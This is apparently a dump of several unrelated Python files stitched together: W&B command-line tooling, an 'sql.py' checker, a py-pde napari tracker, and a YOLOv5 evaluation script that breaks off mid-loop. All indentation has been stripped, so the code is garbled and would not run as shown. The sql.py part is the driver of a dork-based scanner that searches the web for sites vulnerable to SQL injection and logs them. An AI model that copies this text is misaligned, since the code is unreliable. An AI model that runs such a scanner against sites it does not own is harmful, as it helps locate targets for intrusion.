@display_error
def off():
wandb.ensure_configured()
api = InternalApi()
try:
api.set_setting('disabled', 'true')
click.echo(
"W&B disabled, running your script from this directory will only write metadata locally.")
except configparser.Error as e:
click.echo(
'Unable to write config, copy and paste the following in your terminal to turn off W&B:\nexport WANDB_MODE=dryrun')
RUN_CONTEXT = copy.copy(CONTEXT)
RUN_CONTEXT['allow_extra_args'] = True
RUN_CONTEXT['ignore_unknown_options'] = True
@cli.command(context_settings=RUN_CONTEXT, help="Launch a job")
@click.pass_context
@click.argument('program')
@click.argument('args', nargs=-1)
@click.option('--id', default=None,
help='Run id to use, default is to generate.')
@click.option('--resume', default='never', type=click.Choice(['never', 'must', 'allow']),
help='Resume strategy, default is never')
@click.option('--dir', default=None,
help='Files in this directory will be saved to wandb, defaults to wandb')
@click.option('--configs', default=None,
help='Config file paths to load')
@click.option('--message', '-m', default=None, hidden=True,
help='Message to associate with the run.')
@click.option('--name', default=None,
help='Name of the run, default is auto generated.')
@click.option('--notes', default=None,
help='Notes to associate with the run.')
@click.option("--show/--no-show", default=False,
help="Open the run page in your default browser.")
@click.option('--tags', default=None,
              help='Tags to associate with the run (comma separated).')
@click.option('--run_group', default=None,
help='Run group to associate with the run.')
@click.option('--job_type', default=None,
help='Job type to associate with the run.')
@display_error
def run(ctx, program, args, id, resume, dir, configs, message, name, notes, show, tags, run_group, job_type):
wandb.ensure_configured()
if configs:
config_paths = configs.split(',')
else:
config_paths = []
config = Config(config_paths=config_paths,
wandb_dir=dir or wandb.wandb_dir())
tags = [tag for tag in tags.split(",") if tag] if tags else None
# populate run parameters from env if not specified
id = id or os.environ.get(env.RUN_ID)
message = message or os.environ.get(env.DESCRIPTION)
tags = tags or env.get_tags()
run_group = run_group or os.environ.get(env.RUN_GROUP)
job_type = job_type or os.environ.get(env.JOB_TYPE)
name = name or os.environ.get(env.NAME)
notes = notes or os.environ.get(env.NOTES)
resume = resume or os.environ.get(env.RESUME)
run = wandb_run.Run(run_id=id, mode='clirun',
config=config, description=message,
program=program, tags=tags,
group=run_group, job_type=job_type,
name=name, notes=notes,
resume=resume)
run.enable_logging()
environ = dict(os.environ)
if configs:
environ[env.CONFIG_PATHS] = configs
if show:
environ[env.SHOW_RUN] = 'True'
if not run.api.api_key:
util.prompt_api_key(run.api, input_callback=click.prompt)
try:
rm = run_manager.RunManager(run)
rm.init_run(environ)
except run_manager.Error:
exc_type, exc_value, exc_traceback = sys.exc_info()
wandb.termerror('An Exception was raised during setup, see %s for full traceback.' %
util.get_log_file_path())
wandb.termerror(str(exc_value))
if 'permission' in str(exc_value):
wandb.termerror(
'Are you sure you provided the correct API key to "wandb login"?')
lines = traceback.format_exception(
exc_type, exc_value, exc_traceback)
logger.error('\n'.join(lines))
sys.exit(1)
rm.run_user_process(program, args, environ)
@cli.command(context_settings=RUN_CONTEXT, help="Launch local W&B container (Experimental)")
@click.pass_context
@click.option('--port', '-p', default="8080", help="The host port to bind W&B local on")
@click.option('--daemon/--no-daemon', default=True, help="Run or don't run in daemon mode")
@click.option('--upgrade', is_flag=True, default=False, help="Upgrade to the most recent version")
@click.option('--edge', is_flag=True, default=False, help="Run the bleeding edge", hidden=True)
@display_error
def local(ctx, port, daemon, upgrade, edge):
if not find_executable('docker'):
raise ClickException(
"Docker not installed, install it from https://docker.com" )
if wandb.docker.image_id("wandb/local") != wandb.docker.image_id_from_registry("wandb/local"):
if upgrade:
subprocess.call(["docker", "pull", "wandb/local"])
else:
wandb.termlog("A new version of W&B local is available, upgrade by calling `wandb local --upgrade`")
running = subprocess.check_output(["docker", "ps", "--filter", "name=wandb-local", "--format", "{{.ID}}"])
if running != b"":
if upgrade:
subprocess.call(["docker", "restart", "wandb-local"])
exit(0)
else:
wandb.termerror("A container named wandb-local is already running, run `docker kill wandb-local` if you want to start a new instance")
exit(1)
image = "docker.pkg.github.com/wandb/core/local" if edge else "wandb/local"
command = ['docker', 'run', '--rm', '-v', 'wandb:/vol', '-p', port+':8080', '--name', 'wandb-local']
host = "http://localhost:%s" % port
api.set_setting("base_url", host, globally=True)
if daemon:
command += ["-d"]
command += [image]
# DEVNULL is only in py3
try:
from subprocess import DEVNULL
except ImportError:
DEVNULL = open(os.devnull, 'wb')
code = subprocess.call(command, stdout=DEVNULL)
if daemon:
if code != 0:
wandb.termerror("Failed to launch the W&B local container, see the above error.")
exit(1)
else:
wandb.termlog("W&B local started at http://localhost:%s \U0001F680" % port)
wandb.termlog("You can stop the server by running `docker kill wandb-local`")
if not api.api_key:
ctx.invoke(login, host=host)
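# For reference, with the defaults above the assembled command is roughly equivalent to
# (illustrative only):
#     docker run --rm -v wandb:/vol -p 8080:8080 --name wandb-local -d wandb/local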
@cli.command(context_settings=RUN_CONTEXT)
@click.pass_context
@click.option('--keep', '-N', default=24, help="Keep runs created in the last N hours", type=int)
def gc(ctx, keep):
"""Garbage collector, cleans up your local run directory"""
directory = wandb.wandb_dir()
if not os.path.exists(directory):
raise ClickException('No wandb directory found at %s' % directory)
paths = glob.glob(directory+"/*run*")
dates = [datetime.datetime.strptime(p.split("-")[1],'%Y%m%d_%H%M%S') for p in paths]
since = datetime.datetime.utcnow() - datetime.timedelta(hours=keep)
    bad_paths = [paths[i] for i, d in enumerate(dates) if d < since]
if len(bad_paths) > 0:
click.echo("Found {} runs, {} are older than {} hours".format(len(paths), len(bad_paths), keep))
click.confirm(click.style(
"Are you sure you want to remove %i runs?" % len(bad_paths), bold=True), abort=True)
for path in bad_paths:
shutil.rmtree(path)
click.echo(click.style("Success!", fg="green"))
else:
click.echo(click.style("No runs older than %i hours found" % keep, fg="red"))
@cli.command(context_settings=RUN_CONTEXT, name="docker-run")
@click.pass_context
@click.argument('docker_run_args', nargs=-1)
@click.option('--help')
def docker_run(ctx, docker_run_args, help):
"""Simple docker wrapper that adds WANDB_API_KEY and WANDB_DOCKER to any docker run command.
This will also set the runtime to nvidia if the nvidia-docker executable is present on the system
and --runtime wasn't set.
"""
args = list(docker_run_args)
if len(args) > 0 and args[0] == "run":
args.pop(0)
if help or len(args) == 0:
wandb.termlog("This commands adds wandb env variables to your docker run calls")
subprocess.call(['docker', 'run'] + args + ['--help'])
exit()
#TODO: is this what we want?
if len([a for a in args if a.startswith("--runtime")]) == 0 and find_executable('nvidia-docker'):
args = ["--runtime", "nvidia"] + args
#TODO: image_from_docker_args uses heuristics to find the docker image arg, there are likely cases
#where this won't work
image = util.image_from_docker_args(args)
resolved_image = None
if image:
resolved_image = wandb.docker.image_id(image)
if resolved_image:
args = ['-e', 'WANDB_DOCKER=%s' % resolved_image] + args
else:
wandb.termlog("Couldn't detect image argument, running command without the WANDB_DOCKER env variable")
if api.api_key:
args = ['-e', 'WANDB_API_KEY=%s' % api.api_key] + args
else:
wandb.termlog("Not logged in, run `wandb login` from the host machine to enable result logging")
subprocess.call(['docker', 'run'] + args)
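# Illustrative sketch of what `wandb docker-run` ends up executing (values are examples;
# flags are only added when nvidia-docker, an API key, or an image digest are detected):
#     docker run --runtime nvidia \
#         -e WANDB_DOCKER=<resolved image digest> \
#         -e WANDB_API_KEY=<api key> \
#         <original docker run args ...>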
@cli.command(context_settings=RUN_CONTEXT)
@click.pass_context
@click.argument('docker_run_args', nargs=-1)
@click.argument('docker_image', required=False)
@click.option('--nvidia/--no-nvidia', default=find_executable('nvidia-docker') is not None,
help='Use the nvidia runtime, defaults to nvidia if nvidia-docker is present')
@click.option('--digest', is_flag=True, default=False, help="Output the image digest and exit")
@click.option('--jupyter/--no-jupyter', default=False, help="Run jupyter lab in the container")
@click.option('--dir', default="/app", help="Which directory to mount the code in the container")
@click.option('--no-dir', is_flag=True, help="Don't mount the current directory")
@click.option('--shell', default="/bin/bash", help="The shell to start the container with")
@click.option('--port', default="8888", help="The host port to bind jupyter on")
@click.option('--cmd', help="The command to run in the container")
@click.option('--no-tty', is_flag=True, default=False, help="Run the command without a tty")
@display_error
def docker(ctx, docker_run_args, docker_image, nvidia, digest, jupyter, dir, no_dir, shell, port, cmd, no_tty):
"""W&B docker lets you run your code in a docker image ensuring wandb is configured. It adds the WANDB_DOCKER and WANDB_API_KEY
environment variables to your container and mounts the current directory in /app by default. You can pass additional
args which will be added to `docker run` before the image name is declared, we'll choose a default image for you if
one isn't passed:
wandb docker -v /mnt/dataset:/app/data
wandb docker gcr.io/kubeflow-images-public/tensorflow-1.12.0-notebook-cpu:v0.4.0 --jupyter
wandb docker wandb/deepo:keras-gpu --no-tty --cmd "python train.py --epochs=5"
    By default we override the entrypoint to check for the existence of wandb and install it if not present. If you pass the --jupyter
flag we will ensure jupyter is installed and start jupyter lab on port 8888. If we detect nvidia-docker on your system we will use
the nvidia runtime. If you just want wandb to set environment variable to an existing docker run command, see the wandb docker-run
command.
"""
if not find_executable('docker'):
raise ClickException(
"Docker not installed, install it from https://docker.com")
args = list(docker_run_args)
image = docker_image or ""
# remove run for users used to nvidia-docker
if len(args) > 0 and args[0] == "run":
args.pop(0)
if image == "" and len(args) > 0:
image = args.pop(0)
# If the user adds docker args without specifying an image (should be rare)
if not util.docker_image_regex(image.split("@")[0]):
if image:
args = args + [image]
image = wandb.docker.default_image(gpu=nvidia)
subprocess.call(["docker", "pull", image])
_, repo_name, tag = wandb.docker.parse(image)
resolved_image = wandb.docker.image_id(image)
if resolved_image is None:
raise ClickException(
"Couldn't find image locally or in a registry, try running `docker pull %s`" % image)
if digest:
sys.stdout.write(resolved_image)
exit(0)
existing = wandb.docker.shell(
["ps", "-f", "ancestor=%s" % resolved_image, "-q"])
if existing:
question = {
'type': 'confirm',
'name': 'attach',
'message': "Found running container with the same image, do you want to attach?",
}
result = whaaaaat.prompt([question])
if result and result['attach']:
subprocess.call(['docker', 'attach', existing.split("\n")[0]])
exit(0)
cwd = os.getcwd()
command = ['docker', 'run', '-e', 'LANG=C.UTF-8', '-e', 'WANDB_DOCKER=%s' % resolved_image, '--ipc=host',
'-v', wandb.docker.entrypoint+':/wandb-entrypoint.sh', '--entrypoint', '/wandb-entrypoint.sh']
if nvidia:
command.extend(['--runtime', 'nvidia'])
if not no_dir:
#TODO: We should default to the working directory if defined
command.extend(['-v', cwd+":"+dir, '-w', dir])
if api.api_key:
command.extend(['-e', 'WANDB_API_KEY=%s' % api.api_key])
else:
wandb.termlog("Couldn't find WANDB_API_KEY, run `wandb login` to enable streaming metrics")
if jupyter:
command.extend(['-e', 'WANDB_ENSURE_JUPYTER=1', '-p', port+':8888'])
no_tty = True
cmd = "jupyter lab --no-browser --ip=0.0.0.0 --allow-root --NotebookApp.token= --notebook-dir %s" % dir
command.extend(args)
if no_tty:
command.extend([image, shell, "-c", cmd])
else:
if cmd:
command.extend(['-e', 'WANDB_COMMAND=%s' % cmd])
command.extend(['-it', image, shell])
wandb.termlog("Launching docker container \U0001F6A2")
subprocess.call(command)
MONKEY_CONTEXT = copy.copy(CONTEXT)
MONKEY_CONTEXT['allow_extra_args'] = True
MONKEY_CONTEXT['ignore_unknown_options'] = True
@cli.command(context_settings=MONKEY_CONTEXT, help="Run any script with wandb", hidden=True)
@click.pass_context
@click.argument('program')
@click.argument('args', nargs=-1)
@display_error
def magic(ctx, program, args):
def magic_run(cmd, globals, locals):
try:
exec(cmd, globals, locals)
finally:
pass
sys.argv[:] = args
sys.argv.insert(0, program)
sys.path.insert(0, os.path.dirname(program))
try:
with open(program, 'rb') as fp:
code = compile(fp.read(), program, 'exec')
except IOError:
click.echo(click.style("Could not launch program: %s" % program, fg="red"))
sys.exit(1)
globs = {
'__file__': program,
'__name__': '__main__',
'__package__': None,
'wandb_magic_install': magic_install,
}
prep = '''
import __main__
__main__.__file__ = "%s"
wandb_magic_install()
''' % program
magic_run(prep, globs, None)
magic_run(code, globs, None)
@cli.command(context_settings=CONTEXT, help="Create a sweep")
@click.pass_context
@click.option("--project", "-p", default=None, envvar=env.PROJECT, help="The project of the sweep.")
@click.option("--entity", "-e", default=None, envvar=env.ENTITY, help="The entity scope for the project.")
@click.option('--controller', is_flag=True, default=False, help="Run local controller")
@click.option('--verbose', is_flag=True, default=False, help="Display verbose output")
@click.option('--name', default=False, help="Set sweep name")
@click.option('--program', default=False, help="Set sweep program")
@click.option('--settings', default=False, help="Set sweep settings", hidden=True)
@click.option('--update', default=None, help="Update pending sweep")
@click.argument('config_yaml')
@display_error
def sweep(ctx, project, entity, controller, verbose, name, program, settings, update, config_yaml):
def _parse_settings(settings):
"""settings could be json or comma seperated assignments."""
ret = {}
# TODO(jhr): merge with magic_impl:_parse_magic
if settings.find('=') > 0:
for item in settings.split(","):
kv = item.split("=")
                if len(kv) != 2:
                    wandb.termwarn("Unable to parse sweep settings key value pair", repeat=False)
                    continue
                ret.update(dict([kv]))
return ret
wandb.termwarn("Unable to parse settings parameter", repeat=False)
return ret
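    # Example of the --settings format handled above (illustrative key/value pairs):
    #   "metric=val_loss,method=bayes" -> {"metric": "val_loss", "method": "bayes"}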
if api.api_key is None:
termlog("Login to W&B to use the sweep feature")
ctx.invoke(login, no_offline=True)
sweep_obj_id = None
if update:
parts = dict(entity=entity, project=project, name=update)
err = util.parse_sweep_id(parts)
if err:
wandb.termerror(err)
return
entity = parts.get("entity") or entity
project = parts.get("project") or project
sweep_id = parts.get("name") or update
found = api.sweep(sweep_id, '{}', entity=entity, project=project)
if not found:
wandb.termerror('Could not find sweep {}/{}/{}'.format(entity, project, sweep_id))
return
sweep_obj_id = found['id']
wandb.termlog('{} sweep from: {}'.format(
'Updating' if sweep_obj_id else 'Creating',
config_yaml))
try:
yaml_file = open(config_yaml)
except (OSError, IOError):
wandb.termerror('Couldn\'t open sweep file: %s' % config_yaml)
return
try:
config = util.load_yaml(yaml_file)
except yaml.YAMLError as err:
wandb.termerror('Error in configuration file: %s' % err)
return
if config is None:
wandb.termerror('Configuration file is empty')
return
# Set or override parameters
if name:
config["name"] = name
if program:
config["program"] = program
if settings:
settings = _parse_settings(settings)
if settings:
config.setdefault("settings", {})
config["settings"].update(settings)
if controller:
config.setdefault("controller", {})
config["controller"]["type"] = "local"
is_local = config.get('controller', {}).get('type') == 'local'
if is_local:
tuner = wandb_controller.controller()
err = tuner._validate(config)
if err:
wandb.termerror('Error in sweep file: %s' % err)
return
entity = entity or env.get_entity() or config.get('entity')
project = project or env.get_project() or config.get('project') or util.auto_project_name(
config.get("program"), api)
sweep_id = api.upsert_sweep(config, project=project, entity=entity, obj_id=sweep_obj_id)
wandb.termlog('{} sweep with ID: {}'.format(
'Updated' if sweep_obj_id else 'Created',
click.style(sweep_id, fg="yellow")))
sweep_url = wandb_controller._get_sweep_url(api, sweep_id)
if sweep_url:
wandb.termlog("View sweep at: {}".format(
click.style(sweep_url, underline=True, fg='blue')))
# reprobe entity and project if it was autodetected by upsert_sweep
entity = entity or env.get_entity()
project = project or env.get_project()
if entity and project:
sweep_path = "{}/{}/{}".format(entity, project, sweep_id)
elif project:
sweep_path = "{}/{}".format(project, sweep_id)
else:
sweep_path = sweep_id
wandb.termlog("Run sweep agent with: {}".format(
click.style("wandb agent %s" % sweep_path, fg="yellow")))
if controller:
wandb.termlog('Starting wandb controller...')
tuner = wandb_controller.controller(sweep_id)
tuner.run(verbose=verbose)
@cli.command(context_settings=CONTEXT, help="Run the W&B agent")
@click.pass_context
@click.option("--project", "-p", default=None, envvar=env.PROJECT, help="The project of the sweep.")
@click.option("--entity", "-e", default=None, envvar=env.ENTITY, help="The entity scope for the project.")
@click.option("--count", default=None, type=int, help="The max number of runs for this agent.")
@click.argument('sweep_id')
@display_error
def agent(ctx, project, entity, count, sweep_id):
if api.api_key is None:
termlog("Login to W&B to use the sweep agent feature")
ctx.invoke(login, no_offline=True)
wandb.termlog('Starting wandb agent 🕵️')
wandb_agent.run_agent(sweep_id, entity=entity, project=project, count=count)
# you can send local commands like so:
# agent_api.command({'type': 'run', 'program': 'train.py',
# 'args': ['--max_epochs=10']})
@cli.command(context_settings=CONTEXT, help="Run the W&B local sweep controller")
@click.option('--verbose', is_flag=True, default=False, help="Display verbose output")
@click.argument('sweep_id')
@display_error
def controller(verbose, sweep_id):
click.echo('Starting wandb controller...')
tuner = wandb_controller.controller(sweep_id)
tuner.run(verbose=verbose)
if __name__ == "__main__":
cli()
|
sql.py
|
# Date: 01/27/2021
# Author: Borneo Cyber
# Description: SQL checker
from .log import Log
from .search import Search
from .browser import Browser
from time import sleep, time
from .display import Display
from threading import Thread, RLock
from .const import max_time_to_wait, max_active_browsers
class SQL(object):
def __init__(self, dork, write_over):
self.links = []
self.dork = dork
self.browsers = []
self.search = None
self.lock = RLock()
self.is_alive = True
self.total_found = 0
self.active_links = []
self.display = Display()
self.log = Log(write_over)
def search_manager(self):
search = Search(self.dork)
self.search = search
Thread(target=self.search.start, daemon=True).start()
while self.is_alive:
if not self.search.is_active():
break
else:
link = self.search.get_link()
if link:
with self.lock:
self.links.append(link)
else:
sleep(0.5)
if self.is_alive:
self.is_alive = False
def link_manager(self):
is_started = False
while self.is_alive:
if not self.search:
sleep(1.5)
continue
if not self.search.links.qsize():
continue
browsers = []
for link in self.links:
if not link in self.active_links and len(self.active_links) < max_active_browsers:
self.active_links.append(link)
browser = Browser(link)
browsers.append(browser)
self.browsers.append(browser)
for browser in browsers:
if not is_started and self.is_alive:
                    self.display.info('Please wait, searching for vulnerable targets ...\n')
is_started = True
if not self.is_alive:
break
t = Thread(target=browser.attempt)
t.daemon = True
t.start()
def browser_manager(self):
while self.is_alive:
for browser in self.browsers:
if not self.is_alive:
break
if not browser.is_active:
if browser.is_attempted:
with self.lock:
if browser.link in self.links:
self.links.remove(browser.link)
if browser.is_vulner:
self.total_found += 1
self.log.write(browser.link)
self.display.is_vulner(browser.link)
else:
self.display.is_not_vulner(browser.link)
with self.lock:
self.active_links.remove(browser.link)
self.browsers.remove(browser)
if browser.start_time:
if time() - browser.start_time >= max_time_to_wait:
browser.is_active = False
def start(self):
try:
self.log.setup()
except KeyboardInterrupt:
self.stop()
except:
pass
if not self.is_alive:
return
self.display.info('Starting daemon threads ...')
link_manager = Thread(target=self.link_manager)
link_manager.daemon = True
link_manager.start()
search_manager = Thread(target=self.search_manager)
search_manager.daemon = True
search_manager.start()
self.browser_manager()
def stop(self):
if self.search:
self.search.stop()
self.is_alive = False
self.display.shutdown(self.total_found)
|
interactive.py
|
"""
Special module for defining an interactive tracker that uses napari to display fields
.. codeauthor:: David Zwicker <david.zwicker@ds.mpg.de>
"""
import logging
import multiprocessing as mp
import platform
import queue
import signal
import time
from typing import Any, Dict, Optional
from ..fields.base import FieldBase
from ..tools.docstrings import fill_in_docstring
from ..tools.plotting import napari_add_layers
from .base import InfoDict, TrackerBase
from .intervals import IntervalData
def napari_process(
data_channel: mp.Queue,
initial_data: Dict[str, Dict[str, Any]],
t_initial: float = None,
viewer_args: Dict[str, Any] = None,
):
""":mod:`multiprocessing.Process` running `napari <https://napari.org>`__
Args:
data_channel (:class:`multiprocessing.Queue`):
queue instance to receive data to view
initial_data (dict):
Initial data to be shown by napari. The layers are named according to
the keys in the dictionary. The associated value needs to be a tuple,
where the first item is a string indicating the type of the layer and
the second carries the associated data
t_initial (float):
Initial time
viewer_args (dict):
Additional arguments passed to the napari viewer
"""
logger = logging.getLogger(__name__ + ".napari_process")
try:
import napari
from napari.qt import thread_worker
except ModuleNotFoundError:
logger.error(
"The `napari` python module could not be found. This module needs to be "
"installed to use the interactive tracker."
)
return
logger.info("Start napari process")
# ignore keyboard interrupts in this process
signal.signal(signal.SIGINT, signal.SIG_IGN)
if viewer_args is None:
viewer_args = {}
# start napari Qt GUI
with napari.gui_qt():
# create and initialize the viewer
viewer = napari.Viewer(**viewer_args)
napari_add_layers(viewer, initial_data)
# add time if given
if t_initial is not None:
from qtpy.QtWidgets import QLabel
label = QLabel()
label.setText(f"Time: {t_initial}")
viewer.window.add_dock_widget(label)
else:
label = None
def check_signal(msg: Optional[str]):
"""helper function that processes messages by the listener thread"""
if msg is None:
return # do nothing
elif msg == "close":
viewer.close()
else:
raise RuntimeError(f"Unknown message from listener: {msg}")
@thread_worker(connect={"yielded": check_signal})
def update_listener():
"""helper thread that listens to the data_channel"""
logger.info("Start napari thread to receive data")
# infinite loop waiting for events in the queue
while True:
# get all items from the queue and display the last update
update_data = None # nothing to update yet
while True:
time.sleep(0.02) # read queue with 50 fps
try:
action, data = data_channel.get(block=False)
except queue.Empty:
break
if action == "close":
logger.info("Forced closing of napari...")
yield "close" # signal to napari process to shut down
break
elif action == "update":
update_data = data
# continue running until the queue is empty
else:
logger.warning(f"Unexpected action: {action}")
# update napari view when there is data
if update_data is not None:
logger.debug(f"Update napari layer...")
layer_data, t = update_data
if label is not None:
label.setText(f"Time: {t}")
                    for name, layer in layer_data.items():
                        viewer.layers[name].data = layer["data"]
yield
# start worker thread that listens to the data_channel
update_listener()
logger.info("Shutting down napari process")
class NapariViewer:
"""allows viewing and updating data in a separate napari process"""
def __init__(self, state: FieldBase, t_initial: float = None):
"""
Args:
state (:class:`pde.fields.base.FieldBase`): The initial state to be shown
t_initial (float): The initial time. If `None`, no time will be shown.
"""
self._logger = logging.getLogger(__name__)
# pick a suitable multiprocessing
if platform.system() == "Darwin":
context: mp.context.BaseContext = mp.get_context("spawn")
else:
context = mp.get_context()
# create process that runs napari
self.data_channel = context.Queue()
initial_data = state._get_napari_data()
viewer_args = {
"axis_labels": state.grid.axes,
"ndisplay": 3 if state.grid.dim >= 3 else 2,
}
args = (self.data_channel, initial_data, t_initial, viewer_args)
self.proc = context.Process(target=napari_process, args=args)
# start the process in the background
try:
self.proc.start()
except RuntimeError:
print()
print("=" * 80)
print(
"It looks as if the main program did not use the multiprocessing "
"safe-guard, which is necessary on some platforms. Please protect the "
"main code of your program in the following way:"
)
print("")
print(" if __name__ == '__main__':")
print(" code ...")
print("")
print("The interactive Napari viewer could not be launched.")
print("=" * 80)
print()
self._logger.exception("Could not launch napari process")
def update(self, state: FieldBase, t: float):
"""update the state in the napari viewer
Args:
state (:class:`pde.fields.base.FieldBase`): The new state
t (float): Current time
"""
if self.proc.is_alive():
try:
data = (state._get_napari_data(), t)
self.data_channel.put(("update", data), block=False)
except queue.Full:
pass # could not write data
else:
try:
self.data_channel.get(block=False)
except queue.Empty:
pass
def close(self, force: bool = True):
"""closes the napari process
Args:
force (bool):
Whether to force closing of the napari program. If this is `False`, this
method blocks until the user closes napari manually.
"""
if self.proc.is_alive() and force:
# signal to napari process that it should be closed
try:
self.data_channel.put(("close", None))
except RuntimeError:
pass
self.data_channel.close()
self.data_channel.join_thread()
if self.proc.is_alive():
self.proc.join()
class InteractivePlotTracker(TrackerBase):
"""Tracker showing the state interactively in napari
Note:
The interactive tracker uses the python :mod:`multiprocessing` module to run
`napari <http://napari.org/>`__ externally. The multiprocessing module
has limitations on some platforms, which requires some care when writing your
own programs. In particular, the main method needs to be safe-guarded so that
the main module can be imported again after spawning a new process. An
established pattern that works is to introduce a function `main` in your code,
which you call using the following pattern
.. code-block:: python
def main():
# here goes your main code
if __name__ == "__main__":
main()
The last two lines ensure that the `main` function is only called when the
module is run initially and not again when it is re-imported.
"""
name = "interactive"
@fill_in_docstring
def __init__(
self,
interval: IntervalData = "0:01",
close: bool = True,
show_time: bool = False,
):
"""
Args:
interval:
{ARG_TRACKER_INTERVAL}
close (bool):
Flag indicating whether the napari window is closed automatically at the
end of the simulation. If `False`, the tracker blocks when `finalize` is
called until the user closes napari manually.
show_time (bool):
Whether to indicate the time
"""
# initialize the tracker
super().__init__(interval=interval)
self.close = close
self.show_time = show_time
def initialize(self, state: FieldBase, info: InfoDict = None) -> float:
"""initialize the tracker with information about the simulation
Args:
field (:class:`~pde.fields.FieldBase`):
An example of the data that will be analyzed by the tracker
info (dict):
Extra information from the simulation
Returns:
float: The first time the tracker needs to handle data
"""
if self.show_time:
t_initial = 0 if info is None else info.get("t_start", 0)
else:
t_initial = None
self._viewer = NapariViewer(state, t_initial=t_initial)
return super().initialize(state, info=info)
def handle(self, state: FieldBase, t: float) -> None:
"""handle data supplied to this tracker
Args:
field (:class:`~pde.fields.FieldBase`):
The current state of the simulation
t (float):
The associated time
"""
self._viewer.update(state, t)
def finalize(self, info: InfoDict = None) -> None:
"""finalize the tracker, supplying additional information
Args:
info (dict):
Extra information from the simulation
"""
self._viewer.close(force=self.close)
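# Illustrative usage sketch (assumes the py-pde package with a PDE instance `eq` and an
# initial field `state`; these names are placeholders, not defined in this module):
#
#     if __name__ == "__main__":
#         tracker = InteractivePlotTracker(interval="0:02", show_time=True)
#         eq.solve(state, t_range=10, tracker=tracker)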
|
test.py
|
import argparse
import json
import os
from pathlib import Path
from threading import Thread
import numpy as np
import torch
import yaml
from tqdm import tqdm
from models.experimental import attempt_load
from utils.datasets import create_dataloader
from utils.general import coco80_to_coco91_class, check_dataset, check_file, check_img_size, check_requirements, \
box_iou, non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path, colorstr
from utils.metrics import ap_per_class, ConfusionMatrix
from utils.plots import plot_images, output_to_target, plot_study_txt
from utils.torch_utils import select_device, time_synchronized
def test(data,
weights=None,
batch_size=32,
imgsz=640,
conf_thres=0.001,
iou_thres=0.6, # for NMS
save_json=False,
single_cls=False,
augment=False,
verbose=False,
model=None,
dataloader=None,
save_dir=Path(''), # for saving images
save_txt=False, # for auto-labelling
save_hybrid=False, # for hybrid auto-labelling
save_conf=False, # save auto-label confidences
plots=True,
log_imgs=0, # number of logged images
compute_loss=None):
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device = next(model.parameters()).device # get model device
else: # called directly
set_logging()
device = select_device(opt.device, batch_size=batch_size)
# Directories
save_dir = Path(increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok)) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
gs = max(int(model.stride.max()), 32) # grid size (max stride)
imgsz = check_img_size(imgsz, s=gs) # check img_size
# Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
# if device.type != 'cpu' and torch.cuda.device_count() > 1:
# model = nn.DataParallel(model)
# Half
half = device.type != 'cpu' # half precision only supported on CUDA
if half:
model.half()
# Configure
model.eval()
is_coco = data.endswith('coco.yaml') # is COCO dataset
with open(data) as f:
data = yaml.load(f, Loader=yaml.SafeLoader) # model dict
check_dataset(data) # check
nc = 1 if single_cls else int(data['nc']) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Logging
log_imgs, wandb = min(log_imgs, 100), None # ceil
try:
import wandb # Weights & Biases
except ImportError:
log_imgs = 0
# Dataloader
if not training:
if device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once
path = data['test'] if opt.task == 'test' else data['val'] # path to val/test images
dataloader = create_dataloader(path, imgsz, batch_size, gs, opt, pad=0.5, rect=True,
prefix=colorstr('test: ' if opt.task == 'test' else 'val: '))[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
coco91class = coco80_to_coco91_class()
s = ('%20s' + '%12s' * 6) % ('Class', 'Images', 'Targets', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
p, r, f1, mp, mr, map50, map, t0, t1 = 0., 0., 0., 0., 0., 0., 0., 0., 0.
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class, wandb_images = [], [], [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
img = img.to(device, non_blocking=True)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
targets = targets.to(device)
nb, _, height, width = img.shape # batch size, channels, height, width
with torch.no_grad():
# Run model
t = time_synchronized()
out, train_out = model(img, augment=augment) # inference and training outputs
t0 += time_synchronized() - t
# Compute loss
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[1][:3] # box, obj, cls
# Run NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t = time_synchronized()
out = non_max_suppression(out, conf_thres=conf_thres, iou_thres=iou_thres, labels=lb, multi_label=True)
t1 += time_synchronized() - t
# Statistics per image
for si, pred in enumerate(out):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path = Path(paths[si])
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
predn = pred.clone()
scale_coords(img[si].shape[1:], predn[:, :4], shapes[si][0], shapes[si][1]) # native-space pred
# Append to text file
if save_txt:
gn = torch.tensor(shapes[si][0])[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(save_dir / 'labels' / (path.stem + '.txt'), 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
# W&B logging
if plots and len(wandb_images) < log_imgs:
box_data = [{"position": {"minX": xyxy[0], "minY": xyxy[1], "maxX": xyxy[2], "maxY": xyxy[3]},
"class_id": int(cls),
"box_caption": "%s %.3f" % (names[cls], conf),
"scores": {"class_score": conf},
"domain": "pixel"} for *xyxy, conf, cls in pred.tolist()]
boxes = {"predictions": {"box_data": box_data, "class_labels": names}} # inference-space
wandb_images.append(wandb.Image(img[si], boxes=boxes, caption=path.name))
